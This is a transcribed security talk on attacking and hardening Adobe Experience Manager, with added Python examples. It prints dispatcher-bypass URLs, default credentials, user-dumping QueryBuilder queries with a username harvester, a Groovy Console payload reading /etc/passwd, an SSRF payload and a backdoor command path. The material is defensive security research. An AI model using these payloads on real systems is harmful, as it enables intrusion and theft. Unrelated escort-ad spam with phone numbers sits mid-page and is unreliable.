APACHE SLING & FRIENDS TECH MEETUP
2 - 4 SEPTEMBER 2019
Securing AEM webapps by hacking them
Mikhail Egorov @0ang3el, Security researcher & Bug hunter.
2
Intro
whoami
3
• Security researcher & full-time bug hunter
  - https://bugcrowd.com/0ang3el
  - https://hackerone.com/0ang3el
• Conference speaker
  - https://www.slideshare.net/0ang3el
  - https://speakerdeck.com/0ang3el
AEM & Bug Bounties
4
My research on AEM security
5
PHDays 2015
Hacktivity 2018
LevelUp 2019
https://www.slideshare.net/0ang3el
Fellow hackers
6
@darkarnium, 2016
@fransrosen, 2018
@JonathanBoumanium, 2018
https://medium.com/@jonathanbouman/reflected-xss-at-philips-com-e48bf8f9cd3c
https://speakerdeck.com/fransrosen/a-story-of-the-passive-aggressive-sysadmin-of-aem
http://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
Common AEM deployment
7
[Diagram: the client interacts with the Publish server via AEM Dispatcher! Ports shown: 443/tcp, 4503/tcp, 4502/tcp]
Main blocks:
• Author AEM instance
• Publish AEM instance
• AEM dispatcher (~WAF)
Sources of vulnerabilities
8
• AEM misconfiguration
• AEM code (CVEs)
• 3rd-party plugins
• Your code
9
Vulnerabilities due to misconfiguration
AEM dispatcher bypass – CVE-2016-0957
10
• Blocked by Dispatcher
  - /bin/querybuilder.json
• However passed to publish instance
  - /bin/querybuilder.json/a.css
  - /bin/querybuilder.json/a.icoS
  - /bin/querybuilder.json?a.html
  - /bin/querybuilder.json;%0aa.css
AEM dispatcher bypass – Sling “features”
11
• When a Sling Servlet is registered with sling.servlet.paths, the other properties are ignored (e.g. sling.servlet.extensions)
• Bypassing the extension check
  - /bin/querybuilder.json.css
  - /bin/querybuilder.feed.ico
AEM dispatcher bypass – Sling “features”
12
• When a Sling Servlet is registered with sling.servlet.resourceTypes
• Bypassing the path check
  - Create a node with the proper sling:resourceType under /content/usergenerated/etc/commerce/smartlists
AEM dispatcher security tips
13
• Don't use rules like
  - /0041 { /type "allow" /url "*.css" } # This is bad
• Better use
  - /0041 { /type "allow" /extension 'css' }
AEM dispatcher security tips
14
• Explicit deny rules for dangerous endpoints
  - /0090 { /type "deny" /path "/libs/*" }
  - /0091 { /type "deny" /path "/bin/querybuilder*" }
• Place the explicit deny rules at the end of the policy
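To see why the `/url` glob is the weak rule, why `/extension` alone still lets `.json.css` through, and why the explicit deny belongs at the end, here is an added Python model of dispatcher filter evaluation (example code, not the author's and not the real dispatcher): it parses the rule syntax from the slides, decomposes the request URL Sling-style into path, selectors, extension and suffix, and applies last-match-wins. The purely syntactic decomposition, the `*`-matches-slashes glob and the deny-all first rule are simplifying assumptions.

```python
import re
from typing import Dict, List, Optional, Tuple

# Subset of the dispatcher filter syntax used on the slides, e.g.
#   /0041 { /type "allow" /url "*.css" }
#   /0090 { /type "deny" /path "/libs/*" }
RULE_RE = re.compile(r'/(\d+)\s*\{([^}]*)\}')
PROP_RE = re.compile(r'''/(\w+)\s+(?:"([^"]*)"|'([^']*)')''')
MATCH_KEYS = ('url', 'path', 'selectors', 'extension', 'suffix')


def parse_rules(policy: str) -> List[Dict[str, str]]:
    """Parse filter rules in file order; text after '#' is a comment."""
    rules = []
    for line in policy.splitlines():
        m = RULE_RE.search(line.split('#', 1)[0])
        if not m:
            continue
        props = {k: dq or sq for k, dq, sq in PROP_RE.findall(m.group(2))}
        props['id'] = m.group(1)
        rules.append(props)
    return rules


def decompose(url: str) -> Dict[str, str]:
    """Sling-style URL decomposition (syntactic model, assumed here): the first
    path segment containing a dot ends the resource path, its dotted tail is
    selectors + extension, and every segment after it is the suffix."""
    url = url.split('?', 1)[0]
    segments = url.split('/')
    path_parts, selectors, extension, suffix = [], [], '', ''
    for i, seg in enumerate(segments):
        if '.' in seg:
            name, *tail = seg.split('.')
            path_parts.append(name)
            selectors, extension = tail[:-1], tail[-1]
            if i + 1 < len(segments):
                suffix = '/' + '/'.join(segments[i + 1:])
            break
        path_parts.append(seg)
    return {'url': url, 'path': '/'.join(path_parts),
            'selectors': '.'.join(selectors), 'extension': extension, 'suffix': suffix}


def glob_match(pattern: str, value: str) -> bool:
    """Dispatcher-style glob: '*' matches any run of characters, slashes included."""
    regex = '^' + '.*'.join(re.escape(part) for part in pattern.split('*')) + '$'
    return re.match(regex, value) is not None


def evaluate(policy: str, url: str) -> Tuple[str, Optional[str]]:
    """Return (decision, id of the deciding rule). Rules are checked in order and
    the LAST matching rule wins, which is why a deny placed at the end overrides
    an earlier allow. Nothing matching means deny (assumed default)."""
    req = decompose(url)
    decision, winner = 'deny', None
    for rule in parse_rules(policy):
        keys = [k for k in MATCH_KEYS if k in rule]
        if keys and all(glob_match(rule[k], req[k]) for k in keys):
            decision, winner = rule['type'], rule['id']
    return decision, winner


# Three policies: the slide's bad rule, the better rule, and the better rule
# followed by the explicit deny rules at the end of the policy.
BAD_POLICY = '''
/0001 { /type "deny" /url "*" }
/0041 { /type "allow" /url "*.css" }   # This is bad
'''
BETTER_POLICY = '''
/0001 { /type "deny" /url "*" }
/0041 { /type "allow" /extension 'css' }
'''
HARDENED_POLICY = BETTER_POLICY + '''
/0090 { /type "deny" /path "/libs/*" }
/0091 { /type "deny" /path "/bin/querybuilder*" }
'''

# Constructed sample requests: one legitimate stylesheet and the two
# querybuilder URLs from the slides that end in ".css".
SAMPLE_URLS = ['/etc/designs/site.css',
               '/bin/querybuilder.json/a.css',
               '/bin/querybuilder.json.css']


def compare(urls=SAMPLE_URLS) -> Dict[str, Dict[str, str]]:
    """Decision per URL under each policy, e.g. {'/bin/...': {'bad': 'allow', ...}}."""
    policies = {'bad': BAD_POLICY, 'better': BETTER_POLICY, 'hardened': HARDENED_POLICY}
    return {u: {name: evaluate(p, u)[0] for name, p in policies.items()} for u in urls}


if __name__ == '__main__':
    for url, decisions in compare().items():
        print(f'{url:32} ext={decompose(url)["extension"]:5} {decisions}')
```

Only the hardened policy denies both querybuilder forms while still serving the real stylesheet.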
Default credentials
15
• admin/admin
• author/author
• Geometrixx users
  - grios:password
  - jdoe@geometrixx.info:jdoe
  - …
Default credentials
16
== base64(admin:admin)
Weak passwords / Credential brute-forcing
17
• The properties jcr:createdBy, cq:lastModifiedBy and jcr:lastModifiedBy contain usernames
• Many ways to brute-force
  - LoginStatusServlet
  - GetLoggedInUser servlet
  - CurrentUserServlet
  - …
Weak permissions for JCR
18
• Many ways to access the JCR
  - DefaultGetServlet
  - QueryBuilderJsonServlet
  - QueryBuilderFeedServlet
  - GQLSearchServlet
  - CRXDE Lite
  - …
Weak permissions for JCR
19
• Anonymous user has jcr:write permission for /content/usergenerated/etc/commerce/smartlists
20
/apps/<redacted>/config.author.tidy.1..json/a.ico
Weak permissions for JCR
21
type=nt:file&nodename=*.zip
Weak permissions for JCR
22
path=/home&p.hits=full&p.limit=-1
23
Vulnerabilities due to 3rd-party components
Groovy Console
24
• Exposes a servlet at /bin/groovyconsole/post.servlet without authentication by default
• https://github.com/icfnext/aem-groovy-console
script=def+proc+%3d+”cat+/etc/passwd”.execute()%0d%0aprintln+proc.text
ACS AEM Tools
26
• Exposes Fiddle, with the ability to execute JSP scripts, at /etc/acs-tools/aem-fiddle/_jcr_content.run.html
• May not require authentication
28
AEM vulnerabilities
CVE-2018-12809 (SSRF*)
29
• ReportingServicesProxyServlet (cq-content-insight bundle)
@SlingServlet(
    generateComponent = true,
    metatype = true,
    resourceTypes = {"cq/contentinsight/proxy"},
    extensions = {"json"},
    selectors = {"reportingservices"},
    methods = {"GET"},
    label = "Reporting Services API proxy servlet",
    description = "Proxy servlet for Reporting Services API"
)
public class ReportingServicesProxyServlet extends SlingSafeMethodsServlet {
    private static final String DEFAULT_API_OMNITURE_URL = ".*/api[0-9]*.omniture.com/.*";
    …
}
* SSRF - Server Side Request Forgery
CVE-2018-12809 (SSRF*)
30
• Paths to invoke the servlet
  - /libs/cq/contentinsight/content/proxy.reportingservices.json
  - /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet
• Vulnerable parameter: url
  - url=http://anyurl%23/api1.omniture.com/a
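The root cause is a regex applied to the raw URL string rather than to the host a client would connect to. The added Python below (example code, not Adobe's fix) runs the slide's pattern against the URL-decoded bypass value and a genuine API URL, shows which host each one really targets, and contrasts it with a host-based check; the requirement for https and the rejection of userinfo are assumed hardening choices, and the sample URLs are constructed.

```python
import re
from urllib.parse import urlsplit

# Allow-list pattern exactly as it appears in the servlet on the slide.
DEFAULT_API_OMNITURE_URL = r".*/api[0-9]*.omniture.com/.*"

# Hardened host allow-list (added here): anchored, dots escaped.
ALLOWED_HOST_RE = re.compile(r"^api[0-9]*\.omniture\.com$")


def regex_allows(url: str) -> bool:
    """The original style of check: a regex over the raw URL string. Any URL that
    merely CONTAINS '/api<digits>.omniture.com/' somewhere (fragment, path,
    userinfo) passes, regardless of which host will actually be contacted."""
    return re.match(DEFAULT_API_OMNITURE_URL, url) is not None


def target_host(url: str):
    """Host a client would really connect to, per RFC 3986 parsing
    (text after '#' is a fragment and never reaches the wire)."""
    try:
        return urlsplit(url).hostname
    except ValueError:
        return None


def host_allows(url: str) -> bool:
    """Hardened check (assumed design, not the vendor's fix): parse the URL,
    require https, reject userinfo, and compare the parsed host, not the string."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme != "https" or parts.username is not None:
        return False
    host = parts.hostname
    return host is not None and ALLOWED_HOST_RE.match(host) is not None


# Constructed samples: the slide's bypass value (URL-decoded), a path-based
# variant of the same trick, and a genuine API URL.
SAMPLES = {
    "bypass_fragment": "http://anyurl#/api1.omniture.com/a",
    "bypass_path": "https://attacker.example/api1.omniture.com/x",
    "legit": "https://api1.omniture.com/some/endpoint",
}


def audit(samples=SAMPLES):
    """Per sample: (host actually contacted, regex verdict, host-based verdict)."""
    return {name: (target_host(u), regex_allows(u), host_allows(u))
            for name, u in samples.items()}


if __name__ == "__main__":
    for name, (host, by_regex, by_host) in audit().items():
        print(f"{name:16} host={host!s:20} regex={by_regex!s:5} host_check={by_host}")
```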
ExternalJobPostServlet deser / CVE?
34
• Affects AEM 5.5 / AEM 5.6
@Service
@Properties(value = {
    @Property(name = "sling.servlet.extensions", value = "json"),
    @Property(name = "sling.servlet.paths", value = "/libs/dam/cloud/proxy"),
    @Property(name = "sling.servlet.methods", value = { "POST", "GET", "HEAD" })
})
public class ExternalJobPostServlet extends SlingAllMethodsServlet {
    ...
}
ExternalJobPostServlet deser / CVE?
35
• The parameter file accepts a Java serialized stream and passes it to ObjectInputStream.readObject()
• Hard to exploit in an OSGi environment
38
Automation
AEM RCE bundle
39
• Gives RCE* when you have access to the Felix Console
• https://github.com/0ang3el/aem-rce-bundle.git
* RCE – Remote Code Execution
AEM RCE bundle
40
• Path - /bin/backdoor.html?cmd=ifconfig
AEM Hacker
41
• Scripts to check the security of an AEM application
• aem_hacker.py, aem_discoverer.py, aem_enum.py, aem_ssrf2rce.py, aem_server.py, response.bin, aem-rce-sling-script.sh
• https://github.com/0ang3el/aem-hacker.git
DEMO
42
43
Takeaways
Takeaways
44
• Vulnerabilities can occur at different levels
• Install security updates
• Defense in depth
• Check the security of your AEM application
  - Pentest / Bug bounty
45
Thank you
@0ang3el

Low Sexy Call Girls In Mohali 9053900678 ๐ŸฅตHave Save And Good Place ๐Ÿฅต
ย 
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
ย 
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
Katraj ( Call Girls ) Pune  6297143586  Hot Model With Sexy Bhabi Ready For S...Katraj ( Call Girls ) Pune  6297143586  Hot Model With Sexy Bhabi Ready For S...
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
ย 

Securing AEM webapps by hacking them

  • 1. APACHE SLING & FRIENDS TECH MEETUP, 2 - 4 SEPTEMBER 2019. Securing AEM webapps by hacking them. Mikhail Egorov @0ang3el, Security researcher & Bug hunter.
  • 3. whoami
    - Security researcher & full-time bug hunter: https://bugcrowd.com/0ang3el, https://hackerone.com/0ang3el
    - Conference speaker: https://www.slideshare.net/0ang3el, https://speakerdeck.com/0ang3el
  • 4. AEM & Bug Bounties
  • 5. My research on AEM security: PHDays 2015, Hacktivity 2018, LevelUp 2019 (https://www.slideshare.net/0ang3el)
  • 6. Fellow hackers
    - @darkarnium, 2016: http://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
    - @fransrosen, 2018: https://speakerdeck.com/fransrosen/a-story-of-the-passive-aggressive-sysadmin-of-aem
    - @JonathanBoumanium, 2018: https://medium.com/@jonathanbouman/reflected-xss-at-philips-com-e48bf8f9cd3c
  • 7. Common AEM deployment. Main blocks: Author AEM instance (4502/tcp), Publish AEM instance (4503/tcp), AEM Dispatcher (acts roughly as a WAF, exposed on 443/tcp). Users interact with the Publish server via the AEM Dispatcher; the diagram marks the exposure of the Author instance with a "?".
  • 8. Sources of vulnerabilities: AEM misconfiguration; AEM code (CVEs); 3rd-party plugins; your code.
  • 9. Vulnerabilities due to misconfiguration
  • 10. AEM dispatcher bypass – CVE-2016-0957
    - Blocked by Dispatcher: /bin/querybuilder.json
    - However passed to the publish instance, because the Dispatcher rule matched the raw request string while Sling resolves all of these to the same servlet (suffix, query string and ';' path-parameter variants):
      /bin/querybuilder.json/a.css
      /bin/querybuilder.json/a.icoS
      /bin/querybuilder.json?a.html
      /bin/querybuilder.json;%0aa.css
  • 11. AEM dispatcher bypass – Sling "features"
    - When a Sling servlet is registered with sling.servlet.paths, the other registration properties are ignored (e.g. sling.servlet.extensions); later Sling Servlets Resolver releases added sling.servlet.paths.strict to enforce them, but it is off by default
    - Bypassing the extension check: /bin/querybuilder.json.css, /bin/querybuilder.feed.ico (json/feed become selectors and css/ico the extension, yet the path-bound servlet still handles the request)
  • 12. AEM dispatcher bypass – Sling "features"
    - When a Sling servlet is registered with sling.servlet.resourceTypes, it is reachable through any resource carrying that type, so the URL path can be anything a writable node lives under
    - Bypassing the path check: create a node with the proper sling:resourceType under /content/usergenerated/etc/commerce/smartlists (anonymous has jcr:write there by default, see slide 19)
  • 13. AEM dispatcher security tips
    - Don't use rules like /0041 { /type "allow" /url "*.css" } # This is bad: /url is matched against the raw request string, so a suffix, query string or path parameter ending in .css satisfies it
    - Better use /0041 { /type "allow" /extension 'css' }, which matches the extension as Sling parses it
  • 14. AEM dispatcher security tips
    - Explicit deny rules for dangerous endpoints: /0090 { /type "deny" /path "/libs/*" }, /0091 { /type "deny" /path "/bin/querybuilder*" }
    - Place explicit deny rules at the end of the policy: the last matching filter rule wins, so an allow rule placed after them would override them
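The bypasses on slides 10 and 11 and the fixes on slides 13 and 14 come down to one thing: what Sling parses out of the URL versus what a string glob sees. The following Python model is an added example, not code from the talk or from Adobe's Dispatcher. The rule dicts stand in for Dispatcher filter entries (the real syntax is on slides 13 and 14), the decomposition is simplified (first-dot rule, no repository lookup), and stripping ';...' path parameters before Sling sees the path is an assumption about the servlet container.

```python
"""Sling URL decomposition versus naive Dispatcher /url globbing (added example)."""
import re
from fnmatch import fnmatchcase
from urllib.parse import unquote, urlsplit


def decompose(url):
    """Simplified Sling decomposition: resource path up to the first dot, then
    selectors.extension, then an optional /suffix.  Real Sling resolves the
    longest existing resource path first; for /bin/* servlets the first-dot
    rule gives the same answer."""
    path = unquote(urlsplit(url).path)
    # Assumption: the servlet container strips ';...' path parameters before
    # Sling sees the path, which is why ';%0aa.css' fools a string-matching filter.
    path = re.sub(r";[^/]*", "", path)
    dot = path.find(".")
    if dot == -1:
        return {"path": path, "selectors": [], "extension": "", "suffix": ""}
    resource, rest = path[:dot], path[dot + 1:]
    suffix = ""
    slash = rest.find("/")
    if slash != -1:
        rest, suffix = rest[:slash], rest[slash:]
    pieces = rest.split(".")
    return {"path": resource, "selectors": pieces[:-1],
            "extension": pieces[-1], "suffix": suffix}


def rule_matches(rule, raw_url, parsed):
    """A rule matches when every element it specifies matches."""
    checks = []
    if "url" in rule:        # raw request string: the element slide 13 warns about
        checks.append(fnmatchcase(raw_url, rule["url"]))
    if "path" in rule:       # Sling resource path
        checks.append(fnmatchcase(parsed["path"], rule["path"]))
    if "extension" in rule:  # Sling extension
        checks.append(fnmatchcase(parsed["extension"], rule["extension"]))
    return bool(checks) and all(checks)


def decide(rules, raw_url):
    """Dispatcher filter semantics: every matching rule overrides the previous
    decision, so the last matching rule wins."""
    parsed = decompose(raw_url)
    decision = "deny"
    for rule in rules:
        if rule_matches(rule, raw_url, parsed):
            decision = rule["type"]
    return decision


WEAK_RULES = [
    {"type": "deny", "url": "*"},
    {"type": "allow", "url": "*.css"},   # slide 13: "this is bad"
    {"type": "allow", "url": "*.html"},
    {"type": "deny", "url": "/bin/querybuilder.json"},
]

HARDENED_RULES = [
    {"type": "deny", "url": "*"},
    {"type": "allow", "extension": "css"},   # match the parsed extension instead
    {"type": "allow", "extension": "html"},
    {"type": "deny", "path": "/libs/*"},     # explicit denies last (slide 14)
    {"type": "deny", "path": "/bin/querybuilder*"},
]


def bypass_variants(blocked):
    """The mutations from slides 10 and 11 applied to a blocked URL."""
    return [blocked + "/a.css", blocked + "/a.ico", blocked + "?a.html",
            blocked + ";%0aa.css", blocked + ".css", blocked + ".ico"]


def surviving_bypasses(rules, blocked):
    """Variants of a blocked URL that a rule set still lets through."""
    return [v for v in bypass_variants(blocked) if decide(rules, v) == "allow"]


if __name__ == "__main__":
    target = "/bin/querybuilder.json"
    for name, rules in (("weak", WEAK_RULES), ("hardened", HARDENED_RULES)):
        print(name, decide(rules, target), surviving_bypasses(rules, target))
```

With the weak rule set the exact URL is denied but four of the six mutations get through; with the hardened set every variant decomposes to the resource path /bin/querybuilder and hits the trailing deny, and ordinary page requests such as /content/site/en.html are still allowed.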
  • 15. Default credentials
    - admin/admin
    - author/author
    - Geometrixx (sample content) users, e.g. grios:password, jdoe@geometrixx.info:jdoe, …
  • 17. Weak passwords / credential brute-forcing
    - Properties jcr:createdBy, cq:lastModifiedBy and jcr:lastModifiedBy contain usernames, so any readable content doubles as a user list
    - Many ways to brute-force: LoginStatusServlet, GetLoggedInUser servlet, CurrentUserServlet, …
  • 18. Weak permissions for JCR
    - Many ways to access the JCR: DefaultGetServlet, QueryBuilderJsonServlet, QueryBuilderFeedServlet, GQLSearchServlet, CRXDE Lite, …
  • 19. Weak permissions for JCR
    - Anonymous user has jcr:write permission for /content/usergenerated/etc/commerce/smartlists
  • 21. Weak permissions for JCR: QueryBuilder query type=nt:file&nodename=*.zip (lists every .zip file the requesting user can read, e.g. packages or backups)
  • 22. Weak permissions for JCR: QueryBuilder query path=/home&p.hits=full&p.limit=-1 (dumps all readable user and group nodes with all of their properties, with no result limit)
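Slides 17, 21 and 22 describe a recon loop: query the repository anonymously, then pull account names out of what comes back. The script below is an added example (not one of the talk's aem-hacker scripts): it builds the two QueryBuilder probes with exactly the parameters from slides 21 and 22 and harvests usernames from a response. The JSON response is constructed to look like /bin/querybuilder.json output with p.hits=full and is not captured from a real instance; rep:principalName is included because Oak stores it on the user and group nodes that the /home query returns.

```python
"""QueryBuilder recon helpers (added example; the response below is constructed)."""
import json
from urllib.parse import urlencode

QUERYBUILDER = "/bin/querybuilder.json"

# Properties from slide 17 that leak account names, plus rep:principalName,
# which Oak stores on the user/group nodes under /home that slide 22 dumps.
USERNAME_PROPERTIES = ("jcr:createdBy", "cq:lastModifiedBy",
                       "jcr:lastModifiedBy", "rep:principalName")


def probe_url(**params):
    """Build a QueryBuilder request; ':' '*' '/' stay readable in the query string."""
    return QUERYBUILDER + "?" + urlencode(params, safe=":*/")


ZIP_PROBE = probe_url(type="nt:file", nodename="*.zip")                       # slide 21
HOME_PROBE = probe_url(path="/home", **{"p.hits": "full", "p.limit": "-1"})  # slide 22


def _walk(obj):
    """Yield (key, value) pairs from nested JSON; p.nodedepth nests child nodes."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield key, value
            yield from _walk(value)
    elif isinstance(obj, list):
        for item in obj:
            yield from _walk(item)


def harvest_usernames(response):
    """Return the sorted set of account names a QueryBuilder response leaks."""
    names = set()
    for key, value in _walk(response.get("hits", [])):
        if key in USERNAME_PROPERTIES and isinstance(value, str) and value:
            names.add(value)
    return sorted(names)


def anonymous_can_read(response):
    """A successful query with hits means the querying principal (anonymous,
    if no credentials were sent) can read those nodes; ACL-filtered results
    simply come back with total 0."""
    return bool(response.get("success")) and int(response.get("total", 0)) > 0


# Constructed sample, shaped like a p.hits=full result; not real data.
SAMPLE_RESPONSE = json.loads("""{
  "success": true, "results": 2, "total": 2, "offset": 0,
  "hits": [
    {"jcr:path": "/home/users/g/grios", "jcr:primaryType": "rep:User",
     "rep:principalName": "grios", "jcr:createdBy": "admin"},
    {"jcr:path": "/content/geometrixx/en/jcr:content", "jcr:primaryType": "cq:PageContent",
     "jcr:createdBy": "admin", "cq:lastModifiedBy": "jdoe@geometrixx.info",
     "jcr:lastModifiedBy": "author"}
  ]
}""")

if __name__ == "__main__":
    print(ZIP_PROBE)
    print(HOME_PROBE)
    print(anonymous_can_read(SAMPLE_RESPONSE), harvest_usernames(SAMPLE_RESPONSE))
```

The harvested names feed straight into the brute-force endpoints listed on slide 17, which is why a non-zero total from the /home probe without credentials is a finding on its own.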
  • 23. Vulnerabilities due to third-party components
  • 24. Groovy Console
    - Exposes a servlet at /bin/groovyconsole/post.servlet without authentication by default (https://github.com/icfnext/aem-groovy-console)
  • 26. ACS AEM Tools
    - Exposes AEM Fiddle, with the ability to execute JSP scripts, at /etc/acs-tools/aem-fiddle/_jcr_content.run.html
    - May not require authentication
  • 29. CVE-2018-12809 (SSRF, Server Side Request Forgery)
    - ReportingServicesProxyServlet (cq-content-insight bundle):

        @SlingServlet(
            generateComponent = true,
            metatype = true,
            resourceTypes = {"cq/contentinsight/proxy"},
            extensions = {"json"},
            selectors = {"reportingservices"},
            methods = {"GET"},
            label = "Reporting Services API proxy servlet",
            description = "Proxy servlet for Reporting Services API"
        )
        public class ReportingServicesProxyServlet extends SlingSafeMethodsServlet {
            private static final String DEFAULT_API_OMNITURE_URL = ".*/api[0-9]*.omniture.com/.*";
            ...
        }

  • 30. CVE-2018-12809 (SSRF)
    - Paths to invoke the servlet: /libs/cq/contentinsight/content/proxy.reportingservices.json (a resource of type cq/contentinsight/proxy) and /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet (the servlet's own resource path)
    - Vulnerable parameter: url, e.g. url=http://anyurl%23/api1.omniture.com/a. %23 decodes to '#', so the allow-list regex above finds '/api1.omniture.com/' in the fragment while the outgoing request actually goes to anyurl.
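Why the regex on slide 29 lets the slide 30 payload through, and what a host-based check does differently, as an added example in Python rather than the servlet's Java. This is not Adobe's fix; the hardened function is illustrative, and the choice to require https is an assumption about the upstream API.

```python
"""Allow-list regex from slide 29 versus a host-based check (added example)."""
import re
from urllib.parse import unquote, urlsplit

# Pattern exactly as shown on slide 29.
DEFAULT_API_OMNITURE_URL = r".*/api[0-9]*.omniture.com/.*"
# Anchored, dots escaped, applied to the host component only.
_ALLOWED_HOST = re.compile(r"^api[0-9]*\.omniture\.com$")


def vulnerable_is_allowed(url):
    """Whole-string regex (fullmatch mirrors Java's String.matches(); assumption):
    passes as long as '/api<digits>?omniture.com/' appears anywhere in the URL,
    and the unescaped dot matches any character."""
    return re.fullmatch(DEFAULT_API_OMNITURE_URL, url) is not None


def effective_host(url):
    """The host an HTTP client actually connects to.  Everything after '#'
    is a fragment and is never sent, so text placed there only fools a
    string check."""
    return urlsplit(url).hostname or ""


def hardened_is_allowed(url):
    """Parse first, then compare the host component against an anchored
    pattern; require https so the proxy cannot be pointed at plain-HTTP
    internal services (assumption: the upstream API is https-only)."""
    parts = urlsplit(url)
    return parts.scheme == "https" and _ALLOWED_HOST.match(parts.hostname or "") is not None


def check(param_value):
    """Evaluate a raw 'url' request parameter as it arrives percent-encoded
    (slide 30); the servlet container decodes it before the servlet sees it."""
    url = unquote(param_value)
    return {"url": url,
            "regex_allows": vulnerable_is_allowed(url),
            "hardened_allows": hardened_is_allowed(url),
            "connects_to": effective_host(url)}


if __name__ == "__main__":
    for param in ["http://anyurl%23/api1.omniture.com/a",      # slide 30 payload
                  "https://evil.test/api1.omniture.com/",      # allowed host in the path
                  "https://api1-omniture.com/x",               # unescaped dot
                  "https://api2.omniture.com/some/report"]:    # legitimate
        print(check(param))
```

Three of the four inputs satisfy the regex while connecting somewhere other than an omniture.com API host; only the last passes the host check. The general rule is to decide on the parsed host (and scheme), never on a substring of the raw URL.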
  • 34. ExternalJobPostServlet deserialization / CVE?
    - Affects AEM 5.5 / AEM 5.6

        @Service
        @Properties(value = {
            @Property(name = "sling.servlet.extensions", value = "json"),
            @Property(name = "sling.servlet.paths", value = "/libs/dam/cloud/proxy"),
            @Property(name = "sling.servlet.methods", value = { "POST", "GET", "HEAD" })
        })
        public class ExternalJobPostServlet extends SlingAllMethodsServlet { ... }

  • 35. ExternalJobPostServlet deserialization / CVE?
    - The file parameter accepts a Java serialized stream and passes it to ObjectInputStream.readObject()
    - Hard to exploit in an OSGi environment: classes are resolved during deserialization through the deserializing bundle's own class loader, which only sees the packages that bundle imports, so the usual gadget-chain classes are typically not reachable
  • 39. AEM RCE bundle
    - Allows getting RCE (Remote Code Execution) when having access to the Felix (OSGi web) Console
    - https://github.com/0ang3el/aem-rce-bundle.git
  • 40. AEM RCE bundle
    - Path: /bin/backdoor.html?cmd=ifconfig
  • 41. AEM Hacker
    - Scripts to check the security of an AEM application: aem_hacker.py, aem_discoverer.py, aem_enum.py, aem_ssrf2rce.py, aem_server.py, response.bin, aem-rce-sling-script.sh
    - https://github.com/0ang3el/aem-hacker.git
  • 44. Takeaways
    - Vulnerabilities can occur on different levels
    - Install security updates
    - Defense in depth
    - Check the security of the AEM application: pentest / bug bounty